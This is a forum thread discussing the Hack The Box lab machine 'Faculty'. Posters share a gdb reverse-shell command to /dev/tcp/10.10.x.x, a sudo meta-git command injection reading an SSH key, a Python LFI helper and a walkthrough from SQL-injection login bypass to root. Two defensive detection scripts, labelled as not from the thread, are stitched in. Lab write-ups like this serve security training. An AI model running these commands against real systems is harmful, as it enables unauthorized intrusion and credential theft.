Faculty HTB - [DISCUSSION]
(July 3, 2022, 12:10 PM)HolesInSec Wrote:
(July 3, 2022, 09:26 AM)hacker1111 Wrote: For Root:

export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')

gdb -p $PID

call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'")

Why is attaching to process $PID possible with only the developer user?


Only root (user) and debug (group) have execute permission on /usr/bin/gdb,
and developer is part of the debug group.


(July 3, 2022, 09:25 AM)Exa Wrote:
(July 3, 2022, 07:21 AM)hacker1111 Wrote:
(July 3, 2022, 07:11 AM)quick443 Wrote: Finally got a user but I cannot escalate to developer with the payload that someone posted before:

sudo -u developer /usr/local/bin/meta-git clone 'test||cat /home/developer/.ssh/id_rsa'

meta git cloning into 'test||cat /home/developer/.ssh/id_rsa' at id_rsa

id_rsa:
id_rsa: command 'git clone test||cat /home/developer/.ssh/id_rsa id_rsa' exited with error: Error: spawnSync /bin/sh EACCES


Use this from the /tmp directory and you can just do this:

sudo -u developer /usr/local/bin/meta-git clone 'test||bash'


Thanks, the /tmp directory did the trick. Apparently, the developer user must have read access to the current directory. So running the command from /home/gbyolo/ won't work.


yes :)
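
The meta-git step in the exchange above works because the sudo-allowed binary passes its argument to /bin/sh (the EACCES error quoted above comes from that spawnSync), so `||bash` escapes the intended clone. As an added example that is not from this thread or from meta-git, the following flags sudo log entries whose arguments carry shell metacharacters or an interpreter name, or that were run from a world-writable directory; it assumes sudo's default auth.log line format, and the sample entries are constructed.

```python
import re

# Constructed sudo entries in the line format sudo writes to auth.log. Host, user
# and timestamps are made up; the meta-git commands mirror the ones quoted in this thread.
SAMPLE_AUTH_LOG = """\
Jul  3 09:20:11 faculty sudo:   gbyolo : TTY=pts/0 ; PWD=/home/gbyolo ; USER=developer ; COMMAND=/usr/local/bin/meta-git clone https://example.invalid/repo.git
Jul  3 09:25:40 faculty sudo:   gbyolo : TTY=pts/0 ; PWD=/tmp ; USER=developer ; COMMAND=/usr/local/bin/meta-git clone test||bash
Jul  3 09:26:02 faculty sudo:   gbyolo : TTY=pts/0 ; PWD=/tmp ; USER=developer ; COMMAND=/usr/local/bin/meta-git clone test||cat /home/developer/.ssh/id_rsa
Jul  3 09:30:15 faculty sudo:   gbyolo : TTY=pts/0 ; PWD=/home/gbyolo ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : TTY=\S+ ; PWD=(?P<pwd>\S+) ; "
                     r"USER=(?P<target>\S+) ; COMMAND=(?P<command>.*)$")
# Tokens that let an argument escape the intended command when the sudo-allowed
# binary hands its arguments to /bin/sh (meta-git builds a shell command string).
METACHAR_RE = re.compile(r"\|\||&&|;|\||\$\(|`")
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
WRITABLE_DIRS = ("/tmp", "/dev/shm", "/var/tmp")


def analyse_sudo_line(line):
    """Findings for one sudo COMMAND entry, or None if the line is not one."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    command = m.group("command")
    binary, _, args = command.partition(" ")
    reasons = []
    hits = METACHAR_RE.findall(args)
    if hits:
        reasons.append("shell metacharacters in arguments: " + " ".join(hits))
    named = set(re.split(r"[\s|;&]+", args)) & INTERPRETERS
    if named:
        reasons.append("interpreter named in arguments: " + ", ".join(sorted(named)))
    if m.group("pwd").startswith(WRITABLE_DIRS):
        reasons.append("run from a world-writable directory: " + m.group("pwd"))
    return {"user": m.group("user"), "target": m.group("target"),
            "binary": binary, "command": command, "reasons": reasons}


def suspicious_sudo_commands(log_text):
    """All sudo COMMAND entries in log_text that raised at least one reason."""
    findings = (analyse_sudo_line(entry) for entry in log_text.splitlines())
    return [f for f in findings if f and f["reasons"]]


if __name__ == "__main__":
    for f in suspicious_sudo_commands(SAMPLE_AUTH_LOG):
        print(f"{f['user']} -> {f['target']}: {f['command']}")
        print("    " + "; ".join(f["reasons"]))
```
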
(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer


Thanks....
The problem with people getting SSH without actually completing the challenge is that people can get banned.
The

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

Tbh leeching the SSH key will only give you status and rep on HTB while you'll still learn nothing. Learning something will benefit you in the future as well.

Anyway, here's a simple Python script I wrote to ease the LFI.
Note: it's a cmd loop; you just need to run the script and input your desired file to read.
Example: python lfi.py /etc/passwd
It will output the PDF file which has the attachment of /etc/passwd and copy the web address to your clipboard. You can then download the /etc/passwd as attachment.
I'll improve the script later on to read the attachment.

[code]
import requests
import base64
import sys
import cmd
import clipboard


def getFile(fname):
    # fname = sys.argv[1]
    # fname is meant to be embedded in the payload below; the payload body
    # is not present in the post as scraped, so the string is left empty.
    payload = f"""""".encode()
    payload_b64 = base64.b64encode(payload).decode()
    headers = {"Cookie": "PHPSESSID=m27i0ofuv08082t7csmrhcr96e"}
    data = {"pdf": payload_b64}
    r = requests.post("http://faculty.htb/admin/download.php", data=data, headers=headers)
    if "pdf" in r.text:
        url = "http://faculty.htb/mpdf/tmp/" + r.text.strip()
        clipboard.copy(url)
        return url
    return "No such file"


class LFI(cmd.Cmd):
    prompt = "LFI > "

    def default(self, args):
        print(getFile(args))


LFI().cmdloop()
[/code]

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer


Thx man
I will help you...

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer


awesome

langetmama11 Wrote: [quotes the LFI script post above]

Thanks !!

For those who really want to learn how this machine is intended to be exploited:

- Only 2 ports 22 (SSH) and 80 (HTTP)
- Browsing to the page you will get redirected to a domain (xxxx.htb). Add it to your /etc/hosts.
- You have now a "login" page. If you try with a simple SQL injection, you will be able to bypass it. If you want a list of queries, here you have.
- Once you are "logged in" you will get the name of the platform "School XXXXX XXXXX XXXX"; a quick Google search will give you a new directory/endpoint (otherwise you can fuzz it :D)
- Once there, you have an option to download a PDF, which redirects you to a generated PDF; you can check the version of the framework behind it.
- Another Google search will guide you, and you will now have an exploit (in this post you have a lot of references to the exploit...) [PD: the correct encoding for the exploit is urlencode + urlencode + base64]
- Once you have LFI, you can start reading all along the system, a great way to get in is searching for usual locations, like index.php - login.php - db_connect.php - etc. (@exa gave out a very great way to get the credentials ;) ) 
- Try logging in with the credentials you found + /etc/passwd's users.
- If you are already in and you have a password, normally you do "sudo -l" to check if you can run something as another user.
- Google that binary and you will make a lateral movement to the user.
- Once here, you will start enumerating again (you can use LinPeas, but it's not necessary in this machine...)
- Are you CAPABLE of something? Are you in any interesting GROUP? I think you got it...
- GTFOBins will help you a little, but not too much... Search for what that binary you found is used for... Are you able to attach to something? Maybe a process running as root?
- Get that PID, attach to it, and get your reverse shell.
- Read the root flag :D

Almost everything is already in this post, but here it is all together.
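
The root path in the walkthrough above, and in the gdb exchange earlier in the thread, turns on who can execute a capability-bearing binary: gdb is executable only by root and the debug group, and developer is in that group. As an added example that is not from this thread, the following audit reports which non-root users can reach each capability from `getcap -r` output, file mode/owner/group data and group membership; all three inputs are constructed, `cap_sys_ptrace` on gdb is an assumed value for illustration (the thread only hints that a capability is involved), and both the older `path = caps` and newer `path caps` getcap output styles are accepted.

```python
import stat

# Constructed `getcap -r /` output in both styles libcap has printed (older "path = caps",
# newer "path caps"). The gdb capability is an assumption; the thread only hints at one.
SAMPLE_GETCAP = """\
/usr/bin/gdb = cap_sys_ptrace+ep
/usr/bin/ping cap_net_raw=ep
"""
# Constructed mode/owner/group data for the same paths (os.stat() on a live host); gdb is
# executable only by root and the debug group, as described in this thread.
SAMPLE_FILES = {
    "/usr/bin/gdb": {"mode": 0o750, "owner": "root", "group": "debug"},
    "/usr/bin/ping": {"mode": 0o755, "owner": "root", "group": "root"},
}
# Constructed group membership (/etc/group); developer is in debug, as in this thread.
SAMPLE_GROUPS = {"debug": ["developer"], "root": []}


def parse_getcap(text):
    """Map path -> capability string, accepting both getcap output styles."""
    caps = {}
    for line in text.strip().splitlines():
        sep = " = " if " = " in line else " "
        path, _, rest = line.partition(sep)
        caps[path] = rest.strip()
    return caps


def who_can_execute(info, groups):
    """Non-root principals able to execute a file, from its mode bits, owner and group."""
    mode = info["mode"]
    if mode & stat.S_IXOTH:
        return {"everyone"}
    principals = set()
    if mode & stat.S_IXGRP:
        principals.update(u for u in groups.get(info["group"], []) if u != "root")
    if mode & stat.S_IXUSR and info["owner"] != "root":
        principals.add(info["owner"])
    return principals


def exposed_capabilities(getcap_text, files, groups):
    """(path, caps, principals) for every capability-bearing binary a non-root user can run."""
    findings = []
    for path, caps in parse_getcap(getcap_text).items():
        if path in files:
            reach = who_can_execute(files[path], groups)
            if reach:
                findings.append((path, caps, sorted(reach)))
    return findings


if __name__ == "__main__":
    for path, caps, who in exposed_capabilities(SAMPLE_GETCAP, SAMPLE_FILES, SAMPLE_GROUPS):
        print(f"{path} ({caps}) executable by: {', '.join(who)}")
```

On a live host the same check is fed from `getcap -r /`, `os.stat()` and the `grp` module; a binary whose only non-root principals are members of one administrative group is the case to review first.
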
SSH for user: developer

tyyyyyy


